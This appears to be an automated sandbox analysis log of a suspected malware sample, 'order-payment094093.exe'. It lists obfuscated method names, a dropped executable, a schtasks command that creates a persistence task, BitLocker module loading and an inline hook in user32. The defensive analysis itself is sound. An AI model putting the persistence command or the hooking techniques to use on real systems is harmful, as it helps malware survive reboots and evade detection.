Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, AgfTn8PZPZostMg4gR.cs	High entropy of concatenated method names: 'gEEqBtkhrp', 'lSMqAWaJiT', 'ToString', 'CuQqCaUPdY', 'kFrqvLZJ3i', 'Jt6qFbDJB5', 'DRIq0OQJpv', 'efvqI9K8cO', 'YX9qDgFWZJ', 'C0rqWLcyIl'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, jHUH92F5x82eT8kue8.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yoUgQnd331', 'U6RgnIivXP', 'QqNgzfOIlK', 'SFsLxw1iVY', 'vCkLsvSnoD', 'N9ULgFSt19', 'HYcLL8ixrI', 'LaIq63hYpf5r83arEv3'
Source: 0.2.order-payment094093.exe.9770000.9.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, XGuUXrtsXAhhdiQKZe.cs	High entropy of concatenated method names: 'fn9TAhtmWSWVFbfgJTZ', 'wkrKCstHsjoM7q1uYHg', 'lc9I1bxRLa', 'by9IMNO96S', 'lQJIydQ4cp', 'mxlKekt3Ke6i067IMEl', 'GnKU4Rt4sU1seIy0Ybm'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, GIMunT4iYk3xx1ugU8.cs	High entropy of concatenated method names: 'eCfsDPYYQ5', 'QkcsWvPJXM', 'mY4sBrWYfQ', 'JaCsA4rT9p', 'ApQswtiXFI', 'FXXs3Yv7ku', 'zk4FieGvgfK8xBAloC', 'IT6xp1p0t9ZFOXFuAd', 'I8gss9uSwT', 'i7qsLwOwXI'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, knKmAHniGL4bRURurf.cs	High entropy of concatenated method names: 'ossMsHBk53', 'eyCMLaNaIU', 'SIZM45YFt9', 'L9lMCJmDIg', 'LoZMv4aH5o', 'FdMM0SWKZq', 'MZkMIefwIF', 'U8p1TRI3xW', 'rHn16Tn2iZ', 'qbR1QaTBoA'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, n1tF4W6Sc8lEbmUOSk.cs	High entropy of concatenated method names: 'b9C1C9yABd', 'dDU1v4RRfi', 'yTU1Fotau5', 'zqK10RTd2J', 'dF21IhXX1q', 'eOP1DLK1so', 'Gj81WuddXP', 'PKb1lXNCNp', 'AWB1BKeNTH', 'FOl1AOFvoF'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, HmRFC2sLQkD7yrw0rjl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PKeyUNhdcb', 'iVsyh3sRZ1', 'RKCyZU9Pgl', 'y7WyPPU2MO', 'oSnyiueRWu', 'YAayVcaf8b', 'GhfyT0yVek'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, VbkTsGZTjb6Kr4Bahu.cs	High entropy of concatenated method names: 'ToString', 'nyu3fRhFj8', 'IE23tJ8FZE', 'mBV38wNhZ9', 'hXg3YZ1Zbt', 'gd03X6bFxx', 'A9N3GgNi8r', 'vn13k4NWAR', 'oMG3u1jBFc', 'nQT3aPTthS'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, wmvbqJaiMeWxHytBI0.cs	High entropy of concatenated method names: 'WmwDrr8THU', 'sA6Db6xXZH', 'lZbDO3fYS2', 'fOdD2KgTlD', 'JR9DjbOfuJ', 'DqBDc4DdDZ', 'tobDmFPBJq', 'm8BDpYuHDO', 'hjmDowTDGa', 'X5AD529TpQ'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, Qlj30HVqFZYsUdlPE7.cs	High entropy of concatenated method names: 'CQwq6yHdxy', 'NtvqndR5dF', 'i9g1xbOlKe', 'JfX1sIXGw8', 'nADqfA4ZEo', 'EPpqRA00Dx', 'YQjqJkrAsa', 'x6TqUwcscJ', 'iLwqhnSSth', 'yeyqZav8Ks'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, bJ74aLkRdL2lFP3dCO.cs	High entropy of concatenated method names: 'In0DCX6Xl5', 'YGaDFCuEBv', 'Q9iDIDwd2V', 'ngUInDFWOp', 'vaZIzH5mQu', 'NS0DxxnSA1', 'OhfDsQpu5w', 'mm2DgrTe2V', 'd9kDLA5t0f', 'U0XD4qCnIg'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, nAVntjJpJJnTSZHRaQ.cs	High entropy of concatenated method names: 'JnqHpxHUnh', 'KR6HoUaIWq', 'sodHeW3lPq', 'cOxHtS55Ko', 'TI1HYU9gc9', 'zuRHXOS8oi', 'aEIHkwNfWO', 's3LHuqNr2w', 'RAaH9qxAde', 'oyxHfQsSiG'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, c9RSAhQwebH3jjb38v.cs	High entropy of concatenated method names: 'pSp1ee5KFh', 'oKe1tqYB5d', 'VmV18DiION', 'KoX1Yq1kqv', 'RcG1UpbXwN', 'zas1X40Ru7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, v2maH3vO4NWxGXMerY.cs	High entropy of concatenated method names: 'Dispose', 'f3DsQMa1i0', 'tlsgtNMi0t', 'URDxxVtAwq', 'eH1sntF4WS', 'C8lszEbmUO', 'ProcessDialogKey', 'ekLgx9RSAh', 'oebgsH3jjb', 'p8vggWnKmA'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	High entropy of concatenated method names: 'JjmLSLnd4R', 'i11LCquJDY', 'a3tLvCF0EB', 'jbTLF1iigZ', 'LR1L0HaEKb', 'kMVLIUDWDs', 'TGmLDVnudN', 'KcjLWhpnrE', 'G83LlO4Mwo', 'NJ9LBR1Etl'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, zlS2CaUNoZt65r5stX.cs	High entropy of concatenated method names: 'vmyw9S46ln', 'BLmwRe2oMS', 'aOUwUdZ8Zx', 'albwhuyA9S', 'NIMwteymlr', 'hcCw8LRUNY', 'SQ6wYJAkZK', 'GcxwXKbRwU', 's9hwG0kBWH', 'G8iwkkUys8'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, xT9pNP5WWLchG2pQti.cs	High entropy of concatenated method names: 'L4s0jBkOER', 'eQ60mYZ4Rn', 'anpF81Oy4b', 'VQvFYhwutZ', 'ysMFXTNuvn', 'Ya9FGdoJpf', 'XaSFkoNBEH', 'BggFublKR8', 'RTWFaR2ODq', 'HNbF9qhxw2'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, qLT0uBoY4rWYfQXaC4.cs	High entropy of concatenated method names: 'mtuF2EWwQn', 'Vu1Fc949oV', 'LnAFpbcZMm', 'NWmFoRHp02', 'B4SFwCnZLx', 'SYhF3tbtLE', 'auVFq0Qcs9', 'eVsF16mpNA', 'r0bFMCtEna', 'CLuFyxjs9G'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, OPYYQ5pJkcvPJXM8Oe.cs	High entropy of concatenated method names: 'JlmvUUfevB', 'RUdvhxxp8b', 'VMbvZnGwcf', 'xEfvP4YNOh', 'byVviVGU7f', 'W0KvVNCOJr', 'xwHvT14WDB', 'Oejv6Z8lcO', 't88vQ0XyQe', 'YjtvnJVykL'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, z5SciPzwWtS4eXFgWC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pv1MHmk3oY', 'SHvMwgyxlU', 'zLbM3SuwOE', 'o6RMq97gp6', 'zbXM1pbWBr', 'U8gMMdfAXv', 'HycMyn1gPk'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, JFIeXXeYv7kuXqVyGk.cs	High entropy of concatenated method names: 'x48ISMimpo', 'f45Ivd0Joo', 'zZiI0cWwcS', 'pv7IDWD0YU', 'DwvIWO9gjv', 'EZx0i05nG0', 'V280VMXL4d', 'iWC0TwxQSl', 'h5c063fsqe', 'iWO0QKH34q'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, vH7PRfgnydZNX4Yejl.cs	High entropy of concatenated method names: 'fFqORAMsc', 'NYU27LXB0', 'kGGcJAxqp', 'fJkmT7mWB', 'XcKo00Uno', 'QvA5OPIil', 'M8Re3ys1JuEZVQf29p', 'EnMkKFgm8yFi7cdWlV', 'F051K86jn', 'JAoyDyiUZ'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, lZlXECsxIReyoBC4FkM.cs	High entropy of concatenated method names: 'IVoMrIB8DF', 'AItMbUmoYl', 'OiSMOKVe2n', 'FyiM2OuasR', 'TtwMjh0b7S', 'fU3McWtTka', 'iWdMmjtg8Q', 'kbjMpb0EDh', 'toWMoMqKXB', 'nCmM5t2x96'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, AgfTn8PZPZostMg4gR.cs	High entropy of concatenated method names: 'gEEqBtkhrp', 'lSMqAWaJiT', 'ToString', 'CuQqCaUPdY', 'kFrqvLZJ3i', 'Jt6qFbDJB5', 'DRIq0OQJpv', 'efvqI9K8cO', 'YX9qDgFWZJ', 'C0rqWLcyIl'
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, jHUH92F5x82eT8kue8.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yoUgQnd331', 'U6RgnIivXP', 'QqNgzfOIlK', 'SFsLxw1iVY', 'vCkLsvSnoD', 'N9ULgFSt19', 'HYcLL8ixrI', 'LaIq63hYpf5r83arEv3'

Source: C:\Users\user\Desktop\order-payment094093.exe

File created: C:\Users\user\AppData\Roaming\NFOLsr.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\order-payment094093.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE2

Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
